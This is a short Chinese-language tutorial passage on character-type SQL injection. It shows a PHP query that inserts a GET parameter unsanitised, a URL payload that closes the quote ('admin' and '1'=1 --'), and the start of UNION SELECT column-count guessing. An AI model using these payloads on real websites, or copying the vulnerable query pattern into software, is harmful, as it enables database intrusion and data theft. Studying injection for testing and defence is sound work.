一、字符型
针对如下php代码进行注入:
$sql="select user_name from users where name='$_GET['name']'";
select user_name from users where name='admin'
http://url/xxx.php?name=admin' and '1'=1 --'
select user_name from users where name='admin' and '1'=1 --''
在上面的sql语句中可以发现,通过闭合原本的单引号,在后面添加新的查询语句,可达到注入目的。(mysql中两个单引号中间为空会被忽略,若出现单个单引号会有语法错误。)
成功后可以开始进行猜解数据库了:
1、首先猜字段数
union select 1,2,3,4,5,6……(字段数为多少,后面的数字就到几,如union select 1,2,3,4,5能够成功返回结果则表示字段数为5)